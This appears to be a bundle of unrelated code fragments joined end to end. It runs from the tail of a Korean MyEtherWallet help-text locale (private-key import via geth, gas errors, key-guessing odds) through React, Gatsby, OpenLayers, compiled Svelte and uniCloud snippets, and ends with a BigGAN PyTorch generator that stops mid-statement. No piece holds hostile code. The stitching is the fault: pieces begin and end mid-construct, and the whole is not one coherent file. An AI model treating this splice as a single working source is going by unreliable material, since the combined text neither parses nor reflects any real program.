"nothing_special_delete_me.txt"를 삭제합니다. ', HELP_12_Desc_22 : '이후 이더리움 지갑 어플리케이션을 열 면 계정이 "계정" 아래에 표시됩니다.". ', HELP_12_Desc_23 : '메모장을 열고 개인 키를 붙여넣습니다. ', HELP_12_Desc_24 : '"C :"에 "nothing_special_delete_me.txt"이름으로 파일을 저장합니다. ', HELP_12_Desc_25 : '"geth 계정 가져오기 C : \\ nothing_special_delete_me.txt" 명령을 실행합니다. ', HELP_12_Desc_26 : '명령을 실행하면 새 비밀번호를 입력하라는 메시지가 나타납니다. 이것은 트랜잭션을 전송할 때마다 geth / 이더리움 지갑 / Mist에서 사용할 비밀번호이므로 절대 잃어버리지 마십시오. ', HELP_12_Desc_27 : '가져오기가 성공하면 "nothing_special_delete_me.txt"를 삭제합니다. ', HELP_12_Desc_28 : '다음에 이더리움 지갑 어플리케이션을 열 면 계정이 "계정" 아래에 표시됩니다. ', HELP_13_Title : '13) "잔액 부족. 계좌에 충분한 자금이 없습니다. 필요한 : XXXXXXXXXXXXXXXXXXX 그리고 가지고 있는: XXXXXXXXXXXXXXXXXXX" 는 어떤 의미인가요? ', HELP_13_Desc_1 : '이것은 가스 비용을 충당하기 위해 계좌에 이더리움이 부족하다는 의미입니다. 각각의 트랜잭션(토큰 및 컨트랙트 트랜잭션을 포함하여) 가스가 필요하고 그 가스는 이더리움으로 지불됩니다. 표시된 숫자는 Wei에서 트랜잭션의 비용을 충당하기 위해 필요한 금액입니다. 이 숫자를 "1000000000000000000"으로 나눈 다음, 당신이 전송하려고 하는 이더리움의 금액을 제외합니다.(이더리움을 전송하려고 하는 경우) 이렇게 하면 트랜잭션을 만들기 위해 해당 계좌로 전송하는데 필요한 이더리움의 금액을 알 수 있습니다. ', HELP_14_Title : '14) 일부 사이트들은 마우스의 조작을 통해 개인 키 생성을 무작위로 시드 합니다. MyEtherWallet.com은 이 방식을 사용하지 않습니다. MyEtherWallet의 무작위 숫자 생성이 안전할까요? ', HELP_14_Desc_1 : '대상을 움직이는 마우스는 영리하게 작동하며 우리는 사람들이 그것을 좋아하는 이유를 이해하지만, 실제 window.crypto는 당신의 마우스 조작보다 더 많은 엔트로피를 보장합니다. 마우스의 조작은 안전하지 못합니다. 우리와 다른 많은 암호 실험들은 window.crypto를 믿습니다. 게다가 MyEtherWallet.com은 터치 장치에서도 이용될 수 있습니다. 여기에 [마우스 조작에 관해 화가 난 Reddit 이용자와 비탈릭의 대화 v.window.crypto](https://www.reddit.com/r/ethereum/comments/2bilqg/note_there_is_a_paranoid_highsecurity_way_to/cj5sgrm)와 [ window.crypto w3 spec](https://dvcs.w3.org/hg/webcrypto-api/raw-file/tip/spec/Overview.html#dfn-GloblCrypto)가 있습니다. ', HELP_15_Title : '15) 방금 만든 계정이 블록체인 탐색기에 표시되지 않는 이유는 뭔가요? (예, etherchain, etherscan) ', HELP_15_Desc_1 : '계좌는 거래 활동이 있을 경우에만 블록체인 탐색기에 표시됩니다. 예를 들어, 이더리움을 계좌로 이동시키면 계좌가 활성화됩니다. ', HELP_16_Title : '16) 내 계좌의 잔액을 어떻게 확인하나요? ', HELP_16_Desc_1 : '[etherscan.io] (http://etherscan.io/) 와 같은 블록체인 탐색기를 사용할 수 있습니다. 주소를 검색 창에 붙여넣으면 주소와 거래 내역이 표시됩니다. 예를 들어, 우리의 [기부 계정]은 (http://etherscan.io/address/0x7cb57b5a97eabe94205c07890be4c1ad31e486a8) 과 같습니다. ', HELP_17_Title : '17) 내 지갑에서 잔액이 표시되지 않는 이유는 뭔가요? ', HELP_17_Desc_1 : '그 이유는 방화벽 때문입니다. 우리가 잔액 정보를 얻고 잔액 정보를 변환하는 데 사용하는 API는 어떤 이유로 든 방화벽에 의해 차단되는 경우가 많습니다. 사용자는 계속해서 트랜잭션을 보낼 수 있습니다. 당신은 단지 잔액을 확인하기 위해 etherscan.io 블록체인 탐색 사이트와 같은 다른 방법을 사용해야 될 수 있습니다. ', HELP_18_Title : '18) 내 geth 지갑 파일이 어디 있나요? ', HELP_19_Title : '19) 내 Mist 지갑 파일이 어디 있나요? ', HELP_19_Desc_1 : 'Mist 파일은 일반적으로 위의 파일 위치에서 찾을 수 있지만 Mist를 열려면 맨 위 표시할 줄에서 "계좌"를 선택하고 "백업"을 선택한 다음 "계좌"를 선택하는 것이 훨씬 간단합니다. 그러면 파일이 저장된 폴더가 열립니다. ', HELP_20_Title : '20) 나의 프리세일 지갑 파일이 어디 있나요? ', HELP_20_Desc_1 : '당신이 지갑 파일을 어디에 보관했든지 간에 지갑 파일은 당신에게 이메일로도 전송되었습니다. 그곳에서 확인하시면 됩니다. "ethereum_wallet_backup.json"이라고 쓰여있는 파일을 찾아서 그 파일을 선택해주세요. 이 지갑 파일은 당신이 프리 세일 구매할 때 만들었던 비밀번호로 암호화되어 있을 것입니다. ', HELP_21_Title : '21) 혹여나 누군가가 랜덤한 개인 키를 넣어 잔고를 찾아서 자기 주소로 보낼 수도 있나요? ', HELP_21_Desc_1 : '짧은 답변 : 가능은 합니다. 하지만 잔고가 있는 계좌를 찾는데 아마 영원한 시간이 걸릴 것입니다. 따라서 불가능하다고 생각하면 될 것 같습니다. ', HELP_21_Desc_2 : '길지만, 최대한 쉽게 설명한 답변: 그래서 이더리움은 [공개 키 암호화](https://en.wikipedia.org/wiki/Public-key_cryptograpy) 특히나 [타원곡선 암호화](https://eprint.iacr.org/2013/734.pdf) 를 기반으로 합니다. 대부분의 서버는 ECC를 통해 보호됩니다. 비트코인은 SSH와 TLS 뿐만 아니라 다른 것들도 많이 사용합니다. 이더리움의 키는 128bit와 192bit보다 더 강력한 256bit 키이며, 이것들은 널리 사용되고 있으며 전문가들도 안전하다고 얘기합니다. ', HELP_21_Desc_3 : '이곳에는 개인 키와 공개 키가 존재합니다. 개인 키는 공개 키를 생성시킬 수 있지만, 공개 키는 개인 키로 되돌릴 수 없습니다. 인터넷과 세계의 비밀들이 이 암호를 사용하고 있다는 사실은, 공개 키에서 개인 키로 되돌리는 방법이 있다면 이것이 한 사람의 문제가 아니라 모든 사람의 문제가 될 것입니다. ', HELP_21_Desc_4 : '만약 누군가가 당신의 개인 키를 소지하고 있다면 당신의 계좌에서 이더리움을 보낼 수 있게 됩니다. 이 얘기는 누군가가 당신의 이메일의 비밀번호를 알고 있다면 당신의 이메일을 읽을 수 있으며, 이메일이나 누군가가 출금할 수 있도록 당신의 은행 계좌 비밀번호를 전송할 수 있다는 것과 마찬가지입니다. 당신은 비밀번호로 암호화된 개인 키인 ‘개인 키의 Keystore 버전’을 다운로드 할 수 있습니다. 이것은 다른 암호로 보호되는 비밀번호를 갖게 되는 것입니다. ', HELP_21_Desc_5 : '그리고 이론상 누군가가 당신의 계좌를 찾을 때까지 64개의 16진수 문자열을 대입한다면 당신의 계좌가 도난당할 수도 있습니다. 사실 똑똑한 사람들은 임의의 개인 키를 매우 빠르게 검사할 수 있는 프로그램을 만들 수 있습니다. 이것은 ‘무차별 대입 공격’ 또는 ‘개인 키 마이닝’이라고 알려져 있습니다. 사람들은 이것에 대해 오랫동안 고민해 왔습니다. 2~3개의 초고속 서버로 그들은 초당 100만 개 이상의 키를 검사할 수 있습니다. 그러나 초당 수많은 것들은 검사하는 것조차 이 서버를 운영하는 비용을 감당하는게 무의미한 일이 될 것입니다. 개인 키를 알아내기 위해선 어마어마한 시간이 걸립니다. ', HELP_21_Desc_6 : '당신이 비트코인에 대해 이해하고 있는 사람이라면 [이 링크로 앞으로 상황을 예측할 수 있을 것입니다.](http://bitcoin.stackexchange.com/questions/32331/two-people-with-same-public-address-how-willpeple) 이것이 어떻게 되는 것인지 설명하자면 : 여태껏 생성된 비트코인의 모든 사토시가 고유한 자체의 개인 키로 전송했다고 가정해봅시다. 두 가지 키가 같은 키에 해당할 확률은 약 100억분의 1입니다. ', HELP_21_Desc_7 : '[좀 더 기술적인 것을 원한다면:] (http://security.stackexchange.com/questions/25375/why-not-use-larger-cipher-keys/25392#25392) *이 숫자는 장치 기술과 아무런 관련이 없습니다. 그것들은 열역학이 허용하는 최대치입니다. 그리고 그것들은 256bit 키에 대한 무차별 대입 공격이 해당 컴퓨터가 다른 물질로 변할 때까지 엄청난 시간이 흘러도 불가능하다는 것을 강하게 암시합니다. ', HELP_21_Desc_8 : '물론, 이 모든 개인 키가 정말로 무작위 방식으로 충분한 엔트로피를 갖고 생성된다고 가정합시다. 이곳에서 생성된 키는 Jaxx 와 Mist/geth와 마찬가지로 해당 기준을 충족시킵니다. 이더리움 지갑들은 모두 좋은 지갑들입니다. 사람의 뇌가 정말로 무작위적인 시드를 만들어내지 못하기 때문에 사람에 의해 만들어진 지갑으로 만들어진 키는 썩 좋지 않습니다. 비트코인 세계에서는 정말로 무작위 방식으로 생성되고 있지 않은 엔트로피나 시드가 부족한 것에 관해 수많은 문제가 있었습니다. 하지만 그것은 언젠가 해결이 될 날을 기다릴 수 있는 것은 별개의 문제입니다. ', HELP_SecCX_Title : '보안 - MyEtherWallet CX ', HELP_SecCX_Desc_1 : '이 확장 프로그램이 내 정보를 어디에 저장하나요? ', HELP_SecCX_Desc_2 : '당신이 Chrome 확장 프로그램에 저장한 정보는 [Chrome.storage](http://chrome.storage/)를 통해 저장됩니다. - 이것은 당신이 Chrome에 비밀번호를 저장한 위치와 같은 위치에 저장됩니다. ', HELP_SecCX_Desc_3 : '어떤 정보가 저장되나요? ', HELP_SecCX_Desc_4 : '주소, 닉네임, 개인 키가 Chrome 스토리지에 저장됩니다. 개인 키는 지갑을 추가할 때 생성된 비밀번호로 암호화됩니다. 닉네임, 지갑 주소는 암호화되지 않습니다. ', HELP_SecCX_Desc_5 : '닉네임과 지갑 주소는 왜 암호화되지 않나요? ', HELP_SecCX_Desc_6 : '닉네임과 지갑 주소를 암호화하면 계좌 잔액과 닉네임들을 확인할 때마다 비밀번호를 입력해야 합니다. 보안이 걱정된다면 Chrome 확장 프로그램 대신 MyEtherWallet.com 을 사용해주세요. ', HELP_Sec_Title : '보안 ', HELP_Sec_Desc_1 : '당신의 첫 번째 질문이 "이 사람들을 신뢰할 수 있나요?"라는 질문이라면 매우 타당한 질문입니다. 다음 내용이 당신의 질문에 대한 답변이 되기를 바랍니다. ', HELP_Sec_Desc_2 : '우리는 2015년 8월부터 운영되어 왔습니다. [www.reddit.com 에서 myetherwallet](https://www.reddit.com/search?q=myetherwalle)을 검색하면 많은 사용자들을 볼 수 있습니다. ', HELP_Sec_Desc_3 : '우리는 절대 돈을 빼가거나 개인 키를 훔치지 않습니다. 이 사이트에 악의적인 코드는 없습니다. 실제로 지갑 생성 페이지는 완전하게 클라이언트 측에서 작동합니다. 즉, 모든 코드가 **사용자 컴퓨터**에서 실행되며 절대 다른 곳에 정보가 저장되거나 전송되지 않습니다. ', HELP_Sec_Desc_4 : '이 URL을 확인해보세요. -- 이 사이트는 GitHub를 통해 소스가 공개되어 있으며 다음 링크에서 확인하실 수 있습니다. : [https://github.com/kvhnuke/etherwallet/tree/gh-pages](https://github.com/kvhnuke/etherwallet/tree/gh-pages) to [https://www.myetherwallet.com](https://www.myetherwallet.com). ', HELP_Sec_Desc_5 : '지갑을 생성하려면, [소스 코드를 다운로드하여 로컬에서 실행하십시오](https://github.com/kvhnuke/etherwallet/releases/latest). 위의 #5를 참조해주세요 ', HELP_Sec_Desc_6 : '테스트 지갑을 생성하고 어떤 네트워크 활동이 진행되는지 확인할 수 있습니다. 가장 쉬운 방법은 페이지를 마우스 오른쪽 버튼을 클릭하여 "요소 검사"를 클릭합니다. "네트워크" 탭으로 이동합니다. 테스트 지갑을 생성하면 네트워크 탭에서 네트워크 활동이 없음을 확인할 수 있습니다. data:image/gif, data:image/png 생성도 역시 네트워크를 사용하지 않는 것을 확인하실 수 있습니다. QR 코드는 컴퓨터에서 생성됩니다. 당신의 컴퓨터에서 아무것도 전송되지 않는 것을 확인하실 수 있습니다. ', HELP_Sec_Desc_8 : '이 도구를 사용하는 것이 내키지 않는다면 사용하지 않아도 됩니다. 우리는 사람들이 커맨드 명령을 입력이나 풀 노드를 실행할 필요 없이 지갑을 생성하고 트랜잭션을 생성하는 데 도움이 되었으면 하는 바램으로 이 도구를 제작하였습니다. 다시 말씀드리자면, 이상한 점을 발견하신다면 우리에게 연락해주세요. 가능한 빨리 답변드리겠습니다. 감사합니다! ', HELP_FAQ_Title : '자주 묻는 질문에 대한 도움이 될 답변 ', HELP_Contact_Title : '연락 방법 ' }; module.exports = ko;
import styled from 'styled-components'; export const Header = styled.View` background: #141419; height: 50px; flex-direction: row; padding: 10px 10px; justify-content: space-between; align-items: center; `; export const CartInfo = styled.View` position: relative; `; export const CartCounter = styled.Text` position: absolute; top: 0; right: 0; font-size: 10px; color: #fff; background: #7159c1; padding: 2px; text-align: center; width: 16px; border-radius: 8px; `;
module.exports = new Date(1974, 10, 18)
// CommonJS, AMD, script tag if (typeof exports !== 'undefined') { module.exports = gcd; } else if (typeof define === 'function' && define.amd) { define(() => { return gcd; }); } else { global.gcd = gcd; } }(typeof window !== 'undefined' ? window : global));
function calculateDistanceIn3dSpce(arr) { let [x1 , y1 , z1 ,x2 , y2 , z2] = [arr[0] , arr[1] , arr[2] , arr[3] , arr[4] ,arr[5]] let distance = Math.sqrt(Math.pow((x1 - x2), 2) + Math.pow((y1 - y2), 2) + Math.pow((z1 - z2), 2)) console.log(distance) } calculateDistanceIn3dSpce([3.5, 0, 1, 0, 2, -1])
import React from 'react' import { graphql } from 'gatsby' import Layout from '../components/Layout' import NotFound from '../components/NotFound' const TRANSLATIONS = { es: { title: 'Página no encontrada', description: 'La página a la que has llegado no existe', }, ca: { title: 'Página no encontrada', description: 'La pàgina a la qual has arribat no existeix', } } const NotFoundTemplate = ({ location }) => { const locale = location.pathname.startsWith('/ca/') ? 'ca' : 'es' const { title, description } = TRANSLATIONS[locale] const pageData = { markdownRemark: { frontmatter: { title, description } } } return ( <Layout pageData={{ ...pageData, locale }} location={location}> {() => ( <NotFound title={title} description={description} /> )} </Layout> ) } export default NotFoundTemplate
goog.provide('ol.interaction'); goog.require('ol'); goog.require('ol.Collection'); goog.require('ol.Kinetic'); goog.require('ol.interaction.DoubleClickZoom'); goog.require('ol.interaction.DragPan'); goog.require('ol.interaction.DragRotate'); goog.require('ol.interaction.DragZoom'); goog.require('ol.interaction.KeyboardPan'); goog.require('ol.interaction.KeyboardZoom'); goog.require('ol.interaction.MouseWheelZoom'); goog.require('ol.interaction.PinchRotate'); goog.require('ol.interaction.PinchZoom'); /** * Set of interactions included in maps by default. Specific interactions can be * excluded by setting the appropriate option to false in the constructor * options, but the order of the interactions is fixed. If you want to specify * a different order for interactions, you will need to create your own * {@link ol.interaction.Interaction} instances and insert them into a * {@link ol.Collection} in the order you want before creating your * {@link ol.Map} instance. The default set of interactions, in sequence, is: * * {@link ol.interaction.DragRotate} * * {@link ol.interaction.DoubleClickZoom} * * {@link ol.interaction.DragPan} * * {@link ol.interaction.PinchRotate} * * {@link ol.interaction.PinchZoom} * * {@link ol.interaction.KeyboardPan} * * {@link ol.interaction.KeyboardZoom} * * {@link ol.interaction.MouseWheelZoom} * * {@link ol.interaction.DragZoom} * * Note that DragZoom renders a box as a vector polygon, so this interaction * should be excluded if you want a build with no vector support. * * @param {olx.interaction.DefaultsOptions=} opt_options Defaults options. * @return {ol.Collection.<ol.interaction.Interaction>} A collection of * interactions to be used with the ol.Map constructor's interactions option. * @api stable */ ol.interaction.defaults = function(opt_options) { var options = opt_options ? opt_options : {}; var interactions = new ol.Collection(); var kinetic = new ol.Kinetic(-0.005, 0.05, 100); var altShiftDragRotate = options.altShiftDragRotate !== undefined ? options.altShiftDragRotate : true; if (altShiftDragRotate) { interactions.push(new ol.interaction.DragRotate()); } var doubleClickZoom = options.doubleClickZoom !== undefined ? options.doubleClickZoom : true; if (doubleClickZoom) { interactions.push(new ol.interaction.DoubleClickZoom({ delta: options.zoomDelta, duration: options.zoomDuration })); } var dragPan = options.dragPan !== undefined ? options.dragPan : true; if (dragPan) { interactions.push(new ol.interaction.DragPan({ kinetic: kinetic })); } var pinchRotate = options.pinchRotate !== undefined ? options.pinchRotate : true; if (pinchRotate) { interactions.push(new ol.interaction.PinchRotate()); } var pinchZoom = options.pinchZoom !== undefined ? options.pinchZoom : true; if (pinchZoom) { interactions.push(new ol.interaction.PinchZoom({ duration: options.zoomDuration })); } var keyboard = options.keyboard !== undefined ? options.keyboard : true; if (keyboard) { interactions.push(new ol.interaction.KeyboardPan()); interactions.push(new ol.interaction.KeyboardZoom({ delta: options.zoomDelta, duration: options.zoomDuration })); } var mouseWheelZoom = options.mouseWheelZoom !== undefined ? options.mouseWheelZoom : true; if (mouseWheelZoom) { interactions.push(new ol.interaction.MouseWheelZoom({ duration: options.zoomDuration })); } var shiftDragZoom = options.shiftDragZoom !== undefined ? options.shiftDragZoom : true; if (shiftDragZoom) { interactions.push(new ol.interaction.DragZoom({ duration: options.zoomDuration })); } return interactions; };
export default { MONTSERRAT: 'Montserrat', };
/* generated by Svelte vX.Y.Z */ import { SvelteComponentDev, add_location, append_dev, destroy_each, detach_dev, dispatch_dev, element, init, insert_dev, noop, safe_not_equal, set_data_dev, space, text } from "svelte/internal"; const file = undefined; function get_each_context(ctx, list, i) { const child_ctx = ctx.slice(); child_ctx[2] = list[i]; return child_ctx; } // (6:0) {#each things as thing} function create_each_block(ctx) { let span; let t0_value = /*thing*/ ctx[2].name + ""; let t0; let t1; const block = { c: function create() { span = element("span"); t0 = text(t0_value); t1 = space(); { const foo = /*foo*/ ctx[1]; console.log({ foo }); debugger; } add_location(span, file, 6, 1, 82); }, m: function mount(target, anchor) { insert_dev(target, span, anchor); append_dev(span, t0); insert_dev(target, t1, anchor); }, p: function update(ctx, dirty) { if (dirty[0] & /*things*/ 1 && t0_value !== (t0_value = /*thing*/ ctx[2].name + "")) set_data_dev(t0, t0_value); if (dirty[0] & /*foo*/ 2) { const foo = /*foo*/ ctx[1]; console.log({ foo }); debugger; } }, d: function destroy(detaching) { if (detaching) detach_dev(span); if (detaching) detach_dev(t1); } }; dispatch_dev("SvelteRegisterBlock", { block, id: create_each_block.name, type: "each", source: "(6:0) {#each things as thing}", ctx }); return block; } function create_fragment(ctx) { let t0; let p; let t1; let t2; let each_value = /*things*/ ctx[0]; let each_blocks = []; for (let i = 0; i < each_value.length; i += 1) { each_blocks[i] = create_each_block(get_each_context(ctx, each_value, i)); } const block = { c: function create() { for (let i = 0; i < each_blocks.length; i += 1) { each_blocks[i].c(); } t0 = space(); p = element("p"); t1 = text("foo: "); t2 = text(/*foo*/ ctx[1]); add_location(p, file, 10, 0, 131); }, l: function claim(nodes) { throw new Error("options.hydrate only works if the component was compiled with the `hydratable: true` option"); }, m: function mount(target, anchor) { for (let i = 0; i < each_blocks.length; i += 1) { each_blocks[i].m(target, anchor); } insert_dev(target, t0, anchor); insert_dev(target, p, anchor); append_dev(p, t1); append_dev(p, t2); }, p: function update(ctx, dirty) { if (dirty[0] & /*things*/ 1) { each_value = /*things*/ ctx[0]; let i; for (i = 0; i < each_value.length; i += 1) { const child_ctx = get_each_context(ctx, each_value, i); if (each_blocks[i]) { each_blocks[i].p(child_ctx, dirty); } else { each_blocks[i] = create_each_block(child_ctx); each_blocks[i].c(); each_blocks[i].m(t0.parentNode, t0); } } for (; i < each_blocks.length; i += 1) { each_blocks[i].d(1); } each_blocks.length = each_value.length; } if (dirty[0] & /*foo*/ 2) set_data_dev(t2, /*foo*/ ctx[1]); }, i: noop, o: noop, d: function destroy(detaching) { destroy_each(each_blocks, detaching); if (detaching) detach_dev(t0); if (detaching) detach_dev(p); } }; dispatch_dev("SvelteRegisterBlock", { block, id: create_fragment.name, type: "component", source: "", ctx }); return block; } function instance($$self, $$props, $$invalidate) { let { things } = $$props; let { foo } = $$props; const writable_props = ["things", "foo"]; Object.keys($$props).forEach(key => { if (!~writable_props.indexOf(key) && key.slice(0, 2) !== "$$") console.warn(`<Component> was created with unknown prop '${key}'`); }); $$self.$set = $$props => { if ("things" in $$props) $$invalidate(0, things = $$props.things); if ("foo" in $$props) $$invalidate(1, foo = $$props.foo); }; $$self.$capture_state = () => { return { things, foo }; }; $$self.$inject_state = $$props => { if ("things" in $$props) $$invalidate(0, things = $$props.things); if ("foo" in $$props) $$invalidate(1, foo = $$props.foo); }; return [things, foo]; } class Component extends SvelteComponentDev { constructor(options) { super(options); init(this, options, instance, create_fragment, safe_not_equal, { things: 0, foo: 1 }); dispatch_dev("SvelteRegisterComponent", { component: this, tagName: "Component", options, id: create_fragment.name }); const { ctx } = this.$$; const props = options.props || ({}); if (/*things*/ ctx[0] === undefined && !("things" in props)) { console.warn("<Component> was created without expected prop 'things'"); } if (/*foo*/ ctx[1] === undefined && !("foo" in props)) { console.warn("<Component> was created without expected prop 'foo'"); } } get things() { throw new Error("<Component>: Props cannot be read directly from the component instance unless compiling with 'accessors: true' or '<svelte:options accessors/>'"); } set things(value) { throw new Error("<Component>: Props cannot be set directly on the component instance unless compiling with 'accessors: true' or '<svelte:options accessors/>'"); } get foo() { throw new Error("<Component>: Props cannot be read directly from the component instance unless compiling with 'accessors: true' or '<svelte:options accessors/>'"); } set foo(value) { throw new Error("<Component>: Props cannot be set directly on the component instance unless compiling with 'accessors: true' or '<svelte:options accessors/>'"); } } export default Component;
import React, { Component } from 'react' import { StatusBar, BackHandler } from 'react-native' import { connect } from 'react-redux' import { Creators as manageAccountActions } from '../../../Stores/reducers/manageAccountReducer' import { Images, Colors } from 'App/Theme' import { translate } from '../../../Locales' import { BackButton, CardRegisterStep } from '../../../Components' import { Container, BackButtonContainer, AccountTitle, HeaderContainer } from './styles' class EditPFAccountScreen extends Component { constructor(props) { super(props) this.state = { steps: [ { title: translate('firstPFAccountStepTitle'), text: '' }, { title: translate('secondPFAccountStepTitle'), text: '' }, { title: translate('bankAccountStepTitle'), text: '' }, { title: translate('digitalAccountStepTitle'), text: '' }, { title: translate('documentAccountStepTitle'), text: '' }, ], loading: false, } } componentDidMount = () => { BackHandler.addEventListener('hardwareBackPress', this.handleBackButton); this.setAccountFormData() } handleBackButton = () => { this.props.navigation.goBack() return true; } setAccountFormData = async () => { let account = this.props.navigation.getParam('account') if(account && account.id) { if(account.BankAccount && account.BankAccount.id) { await this.props.setBankForm(account.BankAccount) delete account.BankAccount } this.props.setAccountFormData(account) } return null } navigateToStep = (activeStep) => { const { account } = this.props if(account.register_step >= activeStep || account.register_step + 1 == activeStep) { return this.props.navigation.push('RegisterAccountsSteps', { activeStep }) } else { return } } render() { const { steps } = this.state const { account } = this.props return ( <Container> <StatusBar translucent={false} backgroundColor="#000" hidden={false}/> <HeaderContainer> <BackButtonContainer onPress={() => this.props.navigation.goBack()}> <BackButton color={Colors.white} size={20}/> </BackButtonContainer> <AccountTitle>{account.legal_representative_name}</AccountTitle> </HeaderContainer> {steps.map((step, index) => ( <CardRegisterStep title={step.title} text={step.text} completed={account.register_step > index ? true : false} final={(steps.length - 1) == index} onPress={account.register_step >= index ? () => this.navigateToStep(index) : () => null} /> ))} </Container> ) } } const mapStateToProps = (state) => ({ account: state.manageAccountReducer.account }) export default connect( mapStateToProps, { ...manageAccountActions } )(EditPFAccountScreen)
'use strict'; exports.main = async (event, context) => { //event为客户端上传的参数 console.log('event : ', event) //返回数据给客户端 return event };
# coding: utf-8 """ BigGAN PyTorch model. From "Large Scale GAN Training for High Fidelity Natural Image Synthesis" By Andrew Brocky, Jeff Donahuey and Karen Simonyan. https://openreview.net/forum?id=B1xsqj09Fm PyTorch version implemented from the computational graph of the TF Hub module for BigGAN. Some part of the code are adapted from https://github.com/brain-research/self-attention-gan This version only comprises the generator (since the discriminator's weights are not released). This version only comprises the "deep" version of BigGAN (see publication). """ from __future__ import (absolute_import, division, print_function, unicode_literals) import os import logging import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from .config import BigGANConfig from .file_utils import cached_path logger = logging.getLogger(__name__) PRETRAINED_MODEL_ARCHIVE_MAP = { 'biggan-deep-128': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-128-pytorch_model.bin", 'biggan-deep-256': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-256-pytorch_model.bin", 'biggan-deep-512': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-512-pytorch_model.bin", } PRETRAINED_CONFIG_ARCHIVE_MAP = { 'biggan-deep-128': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-128-config.json", 'biggan-deep-256': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-256-config.json", 'biggan-deep-512': "https://s3.amazonaws.com/models.huggingface.co/biggan/biggan-deep-512-config.json", } WEIGHTS_NAME = 'pytorch_model.bin' CONFIG_NAME = 'config.json' def snconv2d(eps=1e-12, **kwargs): return nn.utils.spectral_norm(nn.Conv2d(**kwargs), eps=eps) def snlinear(eps=1e-12, **kwargs): return nn.utils.spectral_norm(nn.Linear(**kwargs), eps=eps) def sn_embedding(eps=1e-12, **kwargs): return nn.utils.spectral_norm(nn.Embedding(**kwargs), eps=eps) class SelfAttn(nn.Module): """ Self attention Layer""" def __init__(self, in_channels, eps=1e-12): super(SelfAttn, self).__init__() self.in_channels = in_channels self.snconv1x1_theta = snconv2d(in_channels=in_channels, out_channels=in_channels//8, kernel_size=1, bias=False, eps=eps) self.snconv1x1_phi = snconv2d(in_channels=in_channels, out_channels=in_channels//8, kernel_size=1, bias=False, eps=eps) self.snconv1x1_g = snconv2d(in_channels=in_channels, out_channels=in_channels//2, kernel_size=1, bias=False, eps=eps) self.snconv1x1_o_conv = snconv2d(in_channels=in_channels//2, out_channels=in_channels, kernel_size=1, bias=False, eps=eps) self.maxpool = nn.MaxPool2d(2, stride=2, padding=0) self.softmax = nn.Softmax(dim=-1) self.gamma = nn.Parameter(torch.zeros(1)) def forward(self, x): _, ch, h, w = x.size() # Theta path theta = self.snconv1x1_theta(x) theta = theta.view(-1, ch//8, h*w) # Phi path phi = self.snconv1x1_phi(x) phi = self.maxpool(phi) phi = phi.view(-1, ch//8, h*w//4) # Attn map attn = torch.bmm(theta.permute(0, 2, 1), phi) attn = self.softmax(attn) # g path g = self.snconv1x1_g(x) g = self.maxpool(g) g = g.view(-1, ch//2, h*w//4) # Attn_g - o_conv attn_g = torch.bmm(g, attn.permute(0, 2, 1)) attn_g = attn_g.view(-1, ch//2, h, w) attn_g = self.snconv1x1_o_conv(attn_g) # Out out = x + self.gamma*attn_g return out class BigGANBatchNorm(nn.Module): """ This is a batch norm module that can handle conditional input and can be provided with pre-computed activation means and variances for various truncation parameters. We cannot just rely on torch.batch_norm since it cannot handle batched weights (pytorch 1.0.1). We computate batch_norm our-self without updating running means and variances. If you want to train this model you should add running means and variance computation logic. """ def __init__(self, num_features, condition_vector_dim=None, n_stats=51, eps=1e-4, conditional=True): super(BigGANBatchNorm, self).__init__() self.num_features = num_features self.eps = eps self.conditional = conditional # We use pre-computed statistics for n_stats values of truncation between 0 and 1 self.register_buffer('running_means', torch.zeros(n_stats, num_features)) self.register_buffer('running_vars', torch.ones(n_stats, num_features)) self.step_size = 1.0 / (n_stats - 1) if conditional: assert condition_vector_dim is not None self.scale = snlinear(in_features=condition_vector_dim, out_features=num_features, bias=False, eps=eps) self.offset = snlinear(in_features=condition_vector_dim, out_features=num_features, bias=False, eps=eps) else: self.weight = torch.nn.Parameter(torch.Tensor(num_features)) self.bias = torch.nn.Parameter(torch.Tensor(num_features)) def forward(self, x, truncation, condition_vector=None): # Retreive pre-computed statistics associated to this truncation coef, start_idx = math.modf(truncation / self.step_size) start_idx = int(start_idx) if coef != 0.0: # Interpolate running_mean = self.running_means[start_idx] * coef + self.running_means[start_idx + 1] * (1 - coef) running_var = self.running_vars[start_idx] * coef + self.running_vars[start_idx + 1] * (1 - coef) else: running_mean = self.running_means[start_idx] running_var = self.running_vars[start_idx] if self.conditional: running_mean = running_mean.unsqueeze(0).unsqueeze(-1).unsqueeze(-1) running_var = running_var.unsqueeze(0).unsqueeze(-1).unsqueeze(-1) weight = 1 + self.scale(condition_vector).unsqueeze(-1).unsqueeze(-1) bias = self.offset(condition_vector).unsqueeze(-1).unsqueeze(-1) out = (x - running_mean) / torch.sqrt(running_var + self.eps) * weight + bias else: out = F.batch_norm(x, running_mean, running_var, self.weight, self.bias, training=False, momentum=0.0, eps=self.eps) return out class GenBlock(nn.Module): def __init__(self, in_size, out_size, condition_vector_dim, reduction_factor=4, up_sample=False, n_stats=51, eps=1e-12): super(GenBlock, self).__init__() self.up_sample = up_sample self.drop_channels = (in_size != out_size) middle_size = in_size // reduction_factor self.bn_0 = BigGANBatchNorm(in_size, condition_vector_dim, n_stats=n_stats, eps=eps, conditional=True) self.conv_0 = snconv2d(in_channels=in_size, out_channels=middle_size, kernel_size=1, eps=eps) self.bn_1 = BigGANBatchNorm(middle_size, condition_vector_dim, n_stats=n_stats, eps=eps, conditional=True) self.conv_1 = snconv2d(in_channels=middle_size, out_channels=middle_size, kernel_size=3, padding=1, eps=eps) self.bn_2 = BigGANBatchNorm(middle_size, condition_vector_dim, n_stats=n_stats, eps=eps, conditional=True) self.conv_2 = snconv2d(in_channels=middle_size, out_channels=middle_size, kernel_size=3, padding=1, eps=eps) self.bn_3 = BigGANBatchNorm(middle_size, condition_vector_dim, n_stats=n_stats, eps=eps, conditional=True) self.conv_3 = snconv2d(in_channels=middle_size, out_channels=out_size, kernel_size=1, eps=eps) self.relu = nn.ReLU() def forward(self, x, cond_vector, truncation): x0 = x x = self.bn_0(x, truncation, cond_vector) x = self.relu(x) x = self.conv_0(x) x = self.bn_1(x, truncation, cond_vector) x = self.relu(x) if self.up_sample: x = F.interpolate(x, scale_factor=2, mode='nearest') x = self.conv_1(x) x 